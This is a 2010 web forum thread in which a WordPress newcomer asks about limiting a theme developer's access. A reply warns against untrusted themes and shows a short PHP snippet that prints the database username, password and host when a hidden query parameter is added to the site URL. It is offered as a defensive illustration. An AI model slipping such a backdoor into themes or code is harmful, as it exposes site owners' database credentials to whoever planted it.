PDA

View Full Version : Word Press General question about Security



Keybler
06 Jul 2010, 09:34 AM
Hi,

I have finally given in and installed a Word Press blog for our company.

I really do not have the hours it takes to learn it all so I would like to have a new employee that is really tech savy and good with WP to design the theme and install addons.

My question is about security, since I am unfamiliar with WP, I wondered if there is anyway for him to do certain things without having complete control. Or even if he does, I would make it for a short time then change the main admin password.

Any advice for this blog newbie from someone more experinced with this situtation.

Thanks in advance
Keybler

<CrGeary.com/>
06 Jul 2010, 05:12 PM
Hey, I was thinking about this the other day. About how NOT safe it is for people to use WordPress themes without knowledge of PHP. I'm not sure if you know anything about PHP or any other coding languages, so ill just give you an example:

WordPress, like pretty much every database driven website has a configuration file WordPress's file is located at: http://www.example.com/wp-config.php ( assuming you installed it to the root of your website ) inside it (once you have installed it) it will contain your username/password etc for your database, this is my configuration file ( its for my local server so it does'nt matter if you see it:



// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'sandbox');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', '');

/** MySQL hostname */
define('DB_HOST', 'localhost');


Now, where am i going with this? Well, if you give him access to your website via FTP ( which there is no reason why you should need to ), then he can look at the contents of the file.

Another thing, which is my main point, and my biggest concern would be this, if I added this code to any wordpress theme ( i would have to have access to the source files of the theme ( aka the theme builder ):



if( isset($_GET['hidden_fact']) ){
echo DB_USER . '<br/>';
echo DB_PASSWORD . '<br/>';
echo DB_HOST . '<br/>';
echo DB_USER . '<br/>';
}


Then if you went to your website: http://www.example.com/ then it looks fine, you have your new theme looks great, works great. But when the theme creator comes along, and does this: http://www.example.com/?hidden_fact then he/she gets your database information.

There are loads of similar things he/she could do, which is why i think if your going to use wordpress themes, then you should know basic PHP or basic Programming.


Sorry for the long post, but i felt its important you knew about the wp-config.php file aswell as the little trick.